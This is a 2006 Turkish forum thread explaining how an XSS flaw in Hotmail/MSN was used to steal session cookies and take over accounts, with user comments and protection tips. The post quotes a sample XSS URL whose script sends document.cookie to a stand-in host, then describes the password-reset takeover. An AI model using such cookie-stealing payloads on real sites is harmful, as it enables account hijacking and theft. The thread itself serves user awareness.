Xss hotmail hacking - Google Fan Webmaster Forum
Google Fan Webmaster Forum  

Geri git   Google Fan Webmaster Forum > R10 Webmaster Kütüphanesi > Articles
Xss hotmail hacking Xss hotmail hacking
Kayıt ol ArticlesVBay [4] Sosyal Gruplar Forumları Okundu Kabul Et

R10 Bilgi Arşivi Önemli Bilgilerin ve Paylaşımın Yapıldığı arşivlik konular bölümü. Yaşadığınız sorunu sizden önce birileri mutlaka yaşamıştır.Lütfen ilk buraya göz atın

Cevapla
 
Article Tools
  #1  
Alt
radmin - ait Kullanıcı Resmi (Avatar)
radmin radmin isimli üyemiz çevrimdışıdır. (Offline)
radministrator
Üyelik tarihi: 28-06-2005
Yaş: 31
Tecrübe Puanı: 19
radmin isimli üyemiz bir mücevher!radmin isimli üyemiz bir mücevher!radmin isimli üyemiz bir mücevher!radmin isimli üyemiz bir mücevher!radmin isimli üyemiz bir mücevher!
Feedback Score: 23 reviews
Post a Comment
Jump to Comments
Standart Xss hotmail hacking
yazan radmin 23-10-2006, 02:02:51
Xss hotmail hacking nedir ;

Öncelikle Lamer’lar (Lamer= başkasının yazdığı programla yada kod ile hacklerlık taslayan kişilere verilen isimdir. Gerçekte hack konusunda bir bilgisi yoktur yada yok denecek kadar az olan kişiye denilmekte)
Hotmail’in XSS Kodunu
( Bu kod nasıl bişey diye merak edenler için vereyim (Kötü amaçlı kullanılmasın diye çalışmaz aşağıdaki:
Alıntı:
http://my.msn.com/newmodule.armx?tab=1&tok=FHtk2MVJqNEyaz7ZCA==&page =1%20<script>alert("yönlendiriliyorsunuz")</script>&col=<script>location.href='http://localhost/?cookie='+escape(document.cookie)</script>
)
Bedava (Free) bir Hosting’e yerleştiyorlar burada sizin ilginizi çekecek bir site kuruyorlar. Örneğin Öğretmensiniz ve Milli Eğitim Bakanlığının Yeni Öğretmen Atamaları Hakkındaki Genelgesi Hakkında bir bilginiz. Hacker bunu biliyor ve sizin ilginizi çekecek olan bu siteyi kuruyor. Siteyi kurarken için Hotmail’in XSS Güvenlik Açığına neden olan Kod’u yerleştiriyor ve sitenin ismini size E-mail olarak yolluyor.

E-mail kutunuza gelen site link’ine tıklarsanız, Bilgisayarınızdaki Cookie(Çerez)’ler hacker’ın sitenin içine yerleştirmiş olduğu Kod sayesinde hacker’a gidiyor. Hacker daha sonra bu Cookie’lerin içinden sizin Hotmail Hesabınıza ait olan Cookileri bulup birkaç kod ekleme işlemi ile değiştirip kaydediyor. Daha sonra kendi bilgisayarından şifresiz olarak sizin E-mail’lerinizi okuyabiliyor.

Peki sadece okumakla yetiniyor mu hacker’lar ? Tabii ki hayır! İşte sadece bir hacker’ın düşünebileceği bir kurnazlık daha gösteriyorlar burada. Hotmail Giriş bölümüne geri geliyorlar ve “ Parolamı Unuttum “ seçeneğine tıklayarak sizin E-mail adresinizi giriyorlar, Şifrenizin E-Posta olarak sizin E-mail hesabına gelmesine neden oluyorlar. Daha sonra şifresiz olarak giriş yapabildikleri için giriyor ve hotmail’in göndermiş olduğu “Kayıp Parola“ İsteği mail’inin içindeki şifrenizi alıyorlar. Ve şifreyi, Gizli Sorunuzu ve ya diğer tüm bilgilerinizi tamamen ele geçirmiş oluyorlar.


Bu Güvenlik Açığından Hotmail’in Haberi Yok mu ? Var ancak şu an için bir çözüm ya-da yama yayınlanmadı. Ülkemizde özellikle son 1 haftada bir çok kişinin E-Posta hesabı bu yöntem ile hack edildi.

Hotmail Hesabınızla Neler Yapılabilir?

Ömcelikle size gelen mailler okunabilir. Tabi çoğu kişi gibi, hotmail türü emailleri sadece üye olduğunuz mail listelerinden gelen mailler için kullanıyor. Siz bu tür bir kullanım yapıyor ve bu nedenle de "önemli değil" diye düşünüyorsanız, yanılıyorsunuz. Çünkü Bilişim Polisinin ülkemizde çok yapıldığını bildirdiği ve uyardığı sibersuçlardan birisi "cep telefonu kontür" hırsızlığı.

Kontür hırsızlığı özellikle internet cafeleri kullanan askerlerin başına geliyordu ama bugünlerde bu açık nedeniyle herkesin başına gelebilir oldu. Hotmailinizi ele geçiren kiş, eğer bir adres defteriniz varsa, o defterdeki kişilere mail atarak, "kontür" ihtiyacınız olduğunu ve göndermesini rica ettiğinizi bildiriyor. Bu yollanan kontürleri de sonra satıyor. Bu yolla epeyce yolunu bulanlar olduğu yine Bilişim Polisi tarafından iletilen bir husus.

Hotmail XSS Güvenlik Açığından Korunmak İçin Neler Yapmalıyız ?

Öncelikle her güvenlik açığı potansiyel bir saldırı nedenidir. Hacker’lar her zaman hedef ve kurban bulurlar. Beni neden hedef alsınlar dediğiniz zaman bilin ki hedefin ta kendisi oldunuz. Bilgi güvenliği, Özel Hayat Güvenliği, Günümüzde oldukça önemli.



Tanımadığınız ya – da tanıdığınız kişilerden sizlere gelen ve içinde sadece site ismi (url) bulunuyorsa o adrese asla tıklamayınız. Tanıdığınız kişilerden de dedim çünkü hacker’lar piyasada dolaşan bir mail hacking programı sayesinde istediği E-Posta hesabindan, İstedikleri E-Posta hesabınıza E-mail gönderebiliyorlar.


Size gelen ve içinde site ismi (URL) bulunan E-mail’leri gönderen kişiyi teyit ettikten sonra açınız.


Internet üzerinde güvenliğiniz için mutlaka ama mutlakan Anti-Virüs ve Güvenlik Duvar (FireWaLL) yazılımlarının İKİSİNİ BİRDEN kullanınınız.
kaynak: turk.internet.com
__________________
Hem yarasın, hem yarabandı..
Alıntı ile Cevapla
Görüntüleme 6836 Comments 67
Total Comments 67

Comments

Sayfa 1 Toplam 7 Sayfadan 1 23456 Last »
  2  
Alt 23-10-2006, 02:19:07
tims tims isimli üyemiz çevrimdışıdır. (Offline)
 
Standart
peki bu linki her hahangi bi siteye link olarak koysalar yada indexine iframe seklinde atsalar yine hacklenmezmiyiz cok tehlikeli bisey ya
Alıntı ile Cevapla
  3  
Alt 23-10-2006, 02:48:34
M3RT
Guest
  
Standart
hayır o şekilde coekieslerini çekemezler
Alıntı ile Cevapla
  4  
Alt 23-10-2006, 03:34:05
tosih tosih isimli üyemiz çevrimdışıdır. (Offline)
 
Standart
hobaa. bi mailimi kontrol ediyim ben. bugün r10 dan geldi biri yardım istedi. ama özellikle mailimi kontrol etmemi istedi. diyorum link i yoll dio mailine bak fln. neyse bakim bi mail ime. allahtan fasla kullanmadığım bi mail di neyse tşkller radmin.
Alıntı ile Cevapla
  5  
Alt 23-10-2006, 04:01:53
neolsun neolsun isimli üyemiz çevrimdışıdır. (Offline)
 
Standart
Peki bunun önlemini microsoft almadımı ne bekliyorlar acaba ?
__________________
Lider olmak veya lideri takip eden koyun olmak sadece kendi kararınız olur.
Alıntı ile Cevapla
  6  
Alt 23-10-2006, 04:41:13
baris333 baris333 isimli üyemiz çevrimdışıdır. (Offline)
 
Standart
bu yolla sadece hotmail şifresinimi yoksa bütün şifrelerimi alabiliyorlar.(zone akarm ı kullanmanızı tavsiye ederim cookie kontroli var en üst seviyede hiç bişey olmaz tabi bazı sitler açmanızı istiyebiliyo)
__________________
süperimmmmmm Yaşasın Ben!
Alıntı ile Cevapla
  7  
Alt 23-10-2006, 06:37:44
eXtreme eXtreme isimli üyemiz çevrimdışıdır. (Offline)
 
Standart
bu yöntem ile 5.5 senedir kullandığım msn-hotmail adresim çalındı. 11 senedir başıma ilk defa geliyor. ben yediysem herkes yiyebilir. msnime gelen birisi benden yardım isteyip "mail gönderdim hepsi orada yazıyor" demişti.

hemen önlemlerimi aldım. hotmail support ile iletişime geçtim ve 2-3 gün içerisinde mailı geri aldım.

çalanı savcılığa verecektim. mail adresini keşfettim fakat 15 yaşında bir bebe olduğunu anlayınca ailesine yazık diyerekten acıdım.
__________________
Burçlar - Boş Zamanını Harca
Konu eXtreme tarafından (23-10-2006 Saat 06:47:57 ) değiştirilmiştir..
Alıntı ile Cevapla
  8  
Alt 23-10-2006, 08:50:38
zedrh+
Guest
  
Standart
liinke girdiğinizde istediği cookiyi çektirebiliyor yani aynı açık gmail içinde yahoo içinde geçerli ama yahoo güvenlik önlemleri yüksek olduğu için birazdaha zor hackleniyor. en çerezi hotmail forumdan bikaç kişi bilir aldım anahtarını

neyse sözün özü şudur iblmediğiniz sitelere girmeyin , bilmediğiniz mailleri açmayın
Alıntı ile Cevapla
  9  
Alt 12-11-2006, 18:31:11
saho saho isimli üyemiz çevrimdışıdır. (Offline)
 
Standart
kendi domaininizin mailini kullanmanızı tavsiye ederim çalsalar bile ipler sizin elinizde yahoo da hotmail de falan filan değil panelinizden şifreyi değişip kullanabilirsiniz ama hotmail ve ya diğer herhangi birisine bu mailin sizin olduğunu anlatamazsınız kontor hırsızlığı falan fistan hepside olur kendi mailiniz güvenli bu anlamda
Alıntı ile Cevapla
  10  
Alt 12-11-2006, 18:36:02
Caesar Caesar isimli üyemiz çevrimdışıdır. (Offline)
 
Standart
Bu arada konuyla az ilgili ama

Lamer: solucan demektir. neden solucan demektir. Çünkü lamerlerin genel özellikler buldukları deliğe girmektir. Genelde saklanırlar ve yağmurda ortaya cıkarlar. Yani kendilerine girebilecekleri bir delik bulduklarında ortaya cıkarlar. Onları taşların altında yada kaya aralıklarında görebilirsiniz...

Kısaca lamer kendisinin yada başkasının açtığı deliğe kolaylıkla girebilir ve sanki kendisi açmış gibi ferahça uzun süreler orada yaşayabilir.

İnternette de bu yüzden lamer sıfatı vardır. Yani kendisinin değilde başkasının bulduğu açığı kolayca sahiplenebilir ve kendisininmiş gibi gösterebilir.

Ülkemizde bunun en güzel 2 örneği vardır:
1. Tamer $ahin (Pijamalı Hacker*)
2. İskorpitx (Tavlacı Hacker*)

* = lamer
__________________
nacizane bilgi kaynagi
Alıntı ile Cevapla
Cevapla
Sayfa 1 Toplam 7 Sayfadan 1 23456 Last »


« Previous Article | Next Article »
Article Tools

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok
BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı


Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 19:57:00.

Bize Yazin - Webmaster forumu, webmaster Resource, Hosting, Dedicated, Seo, adsense para kazanma, adwords reklam verme, hosting şirketleri - Arşiv - Yukarı git

Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.

“İnsanların en hayırlısı, insanlara faydalı olandır”. H.Ş

Hosting by Radore Hosting

İçerik sağlayacı paylaşım sitelerinden biri olan R10.net WebMaster Forum Adresimizde 5651 Sayılı Kanun’un 8. Maddesine ve T.C.K’nın 125. Maddesine göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. R10.net hakkında yapılacak tüm hukuksal Şikayetler adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 1 (Bir) Hafta içerisinde R10.net yönetimi olarak tarafımızdan gereken işlemler yapılacak ve Avukatlarımız size dönüş yapacaktır.